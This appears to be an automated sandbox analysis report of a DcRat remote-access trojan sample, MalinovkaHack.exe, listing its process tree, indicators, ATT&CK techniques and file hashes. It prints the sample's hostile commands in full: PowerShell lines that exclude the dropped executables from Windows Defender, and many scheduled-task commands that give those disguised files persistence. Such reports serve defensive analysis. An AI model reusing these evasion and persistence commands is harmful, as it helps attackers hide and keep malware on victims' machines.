pid Process 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe 3748 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4032 mmc.exe 4032 mmc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4812 wrote to memory of 3568 4812 MalinovkaHack.exe 86 PID 4812 wrote to memory of 3568 4812 MalinovkaHack.exe 86 PID 4812 wrote to memory of 3568 4812 MalinovkaHack.exe 86 PID 3568 wrote to memory of 2360 3568 WScript.exe 88 PID 3568 wrote to memory of 2360 3568 WScript.exe 88 PID 3568 wrote to memory of 2360 3568 WScript.exe 88 PID 2360 wrote to memory of 4400 2360 cmd.exe 90 PID 2360 wrote to memory of 4400 2360 cmd.exe 90 PID 4400 wrote to memory of 4012 4400 Providersvc.exe 110 PID 4400 wrote to memory of 4012 4400 Providersvc.exe 110 PID 4400 wrote to memory of 1544 4400 Providersvc.exe 111 PID 4400 wrote to memory of 1544 4400 Providersvc.exe 111 PID 4400 wrote to memory of 2720 4400 Providersvc.exe 112 PID 4400 wrote to memory of 2720 4400 Providersvc.exe 112 PID 4400 wrote to memory of 1656 4400 Providersvc.exe 113 PID 4400 wrote to memory of 1656 4400 Providersvc.exe 113 PID 4400 wrote to memory of 3256 4400 Providersvc.exe 114 PID 4400 wrote to memory of 3256 4400 Providersvc.exe 114 PID 4400 wrote to memory of 3708 4400 Providersvc.exe 115 PID 4400 wrote to memory of 3708 4400 Providersvc.exe 115 PID 4400 wrote to memory of 3096 4400 Providersvc.exe 122 PID 4400 wrote to memory of 3096 4400 Providersvc.exe 122 PID 3096 wrote to memory of 2088 3096 cmd.exe 124 PID 3096 wrote to memory of 2088 3096 cmd.exe 124 PID 3096 wrote to memory of 1356 3096 cmd.exe 129 PID 3096 wrote to memory of 1356 3096 cmd.exe 129 PID 1356 wrote to memory of 2788 1356 Providersvc.exe 137 PID 1356 wrote to memory of 2788 1356 Providersvc.exe 137 PID 1356 wrote to memory of 2576 1356 Providersvc.exe 138 PID 1356 wrote to memory of 2576 1356 Providersvc.exe 138 PID 1356 wrote to memory of 4456 1356 Providersvc.exe 139 PID 1356 wrote to memory of 4456 1356 Providersvc.exe 139 PID 1356 wrote to memory of 3620 1356 Providersvc.exe 143 PID 1356 wrote to memory of 3620 1356 Providersvc.exe 143 PID 3780 wrote to memory of 4692 3780 chrome.exe 171 PID 3780 wrote to memory of 4692 3780 chrome.exe 171 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 PID 3780 wrote to memory of 4956 3780 chrome.exe 172 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\MalinovkaHack.exe"C:\Users\Admin\AppData\Local\Temp\MalinovkaHack.exe"1⤵
- DcRat
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winSvc\ccGdpk3rT2YM94ID.vbe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\winSvc\xmAa8CVrlbATNaJJV37bz26B.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\winSvc\Providersvc.exe"C:\winSvc\Providersvc.exe"4⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winSvc\Providersvc.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sysmon.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winSvc\SearchApp.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AVhwaTjU2n.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:26⤵PID:2088
-
-
C:\winSvc\Providersvc.exe"C:\winSvc\Providersvc.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winSvc\Providersvc.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\SearchApp.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4456
-
-
C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe"C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe"7⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Re4gxnF4du.bat" "8⤵PID:4476
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵PID:5764
-
-
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\sysmon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1956
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:856
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3180
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\winSvc\SearchApp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\winSvc\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:184
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\winSvc\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 7 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4576
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4828
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4264
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3392
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\SearchApp.exe'" /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5000
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\SearchApp.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2232
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4328
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4320
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4032
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff8a98ecc40,0x7ff8a98ecc4c,0x7ff8a98ecc582⤵PID:4692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1936 /prefetch:22⤵PID:4956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1824,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1900 /prefetch:32⤵PID:1516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2324,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2484 /prefetch:82⤵PID:4128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3168 /prefetch:12⤵PID:3460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3304 /prefetch:12⤵PID:4120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4000,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4552 /prefetch:12⤵PID:5284
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4780,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4820 /prefetch:82⤵PID:5440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4940 /prefetch:82⤵PID:5504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=868,i,15907785452588362062,8845278545473123071,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4720 /prefetch:82⤵
- Drops file in System32 directory
PID:5716
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:5188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5520
-
C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe"C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe"1⤵
- Executes dropped EXE
PID:5512
-
C:\Recovery\WindowsRE\dllhost.exeC:\Recovery\WindowsRE\dllhost.exe1⤵
- Executes dropped EXE
PID:5764
-
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\SearchApp.exe"C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\SearchApp.exe"1⤵
- Executes dropped EXE
PID:1028
-
C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe"C:\Program Files (x86)\Windows Portable Devices\TrustedInstaller.exe"1⤵
- Executes dropped EXE
PID:6112
-
C:\Recovery\WindowsRE\sysmon.exeC:\Recovery\WindowsRE\sysmon.exe1⤵
- Executes dropped EXE
PID:5584
-
C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe"C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe"1⤵
- Executes dropped EXE
PID:244
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "Providersvc" /f1⤵
- Process spawned unexpected child process
PID:2596
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "ProvidersvcP" /f1⤵
- Process spawned unexpected child process
PID:1712
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "TrustedInstaller" /f1⤵
- Process spawned unexpected child process
PID:676
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "TrustedInstallerT" /f1⤵
- Process spawned unexpected child process
PID:5696
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "SearchApp" /f1⤵
- Process spawned unexpected child process
PID:5704
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "SearchAppS" /f1⤵
- Process spawned unexpected child process
PID:5756
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "TrustedInstaller" /f1⤵
- Process spawned unexpected child process
PID:2036
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "TrustedInstallerT" /f1⤵
- Process spawned unexpected child process
PID:5740
-
C:\Recovery\WindowsRE\dllhost.exeC:\Recovery\WindowsRE\dllhost.exe1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:4288 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lHuJ4aKJis.bat" "2⤵PID:2844
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:4060
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3568
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dllhost" /f1⤵
- Process spawned unexpected child process
PID:5236
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "dllhostd" /f1⤵
- Process spawned unexpected child process
PID:3944
-
C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe"C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhostw.exe"1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CIMKRyAEqW.bat" "2⤵PID:1956
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:1624
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:6120
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "taskhostw" /f1⤵
- Process spawned unexpected child process
PID:5852
-
C:\Windows\system32\schtasks.exeschtasks.exe /delete /tn "taskhostwt" /f1⤵
- Process spawned unexpected child process
PID:4000
-
C:\Recovery\WindowsRE\sysmon.exeC:\Recovery\WindowsRE\sysmon.exe1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:2792
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3952
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:1964
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
585B
MD5d4c4f8c1af1fec2bde9f4870ce9ba653
SHA1110ac974c3748ce7612049b63521ef9665f2296b
SHA2565cffad79e068897f4a8a5972b83b4febd5c8d626501f18c7d76f4e9a13606a41
SHA512c821a84d3c81549b6e88423eda808e3e08c5f54884d1cbc5379f9debf87bd6cc0c1a208931b479e6340a75b428a9c9eb628dd5cd890d74a6355c6b5608983cab
-
Filesize
372B
MD51bc0eebb91e3006e75b04c1cfbe365fb
SHA1174ef406e01637bf93875fce2627640d5d821e82
SHA256867ada4b993d223be4a92b1be215ab7a06bda9005eebe88db9aa4fbd8191b021
SHA512d579680dc4978d4d11e164fd1aa4143753eeaef7c46c12d6fdd0ade68fc30b8420016fce095a3a8019b69927dc92722ceee26a3a389fda2f8138fffceb3fa566
-
Filesize
377B
MD5001547819b9329107d10b41b755c9376
SHA1ccc0985bb27558604dcc8f275f751a871b0aa8aa
SHA2569d60d40040e331dc97501bed36f225f7e75b3d0400dcd97dcb9b90123d206d66
SHA5125c6d007e8ec6d525595117e4f7c10d5cafec023a5631fd25f6759f46c5c8bbb9ea28642ee61e3a2a228044b367d7e25366f71f99b7e0d1e7e80c8528aecbd87f
-
Filesize
2.0MB
MD5b1d2f7422709227d5430d737a043c4b8
SHA1386c09c9baa7b51920d9fefb407f29f64eaef28a
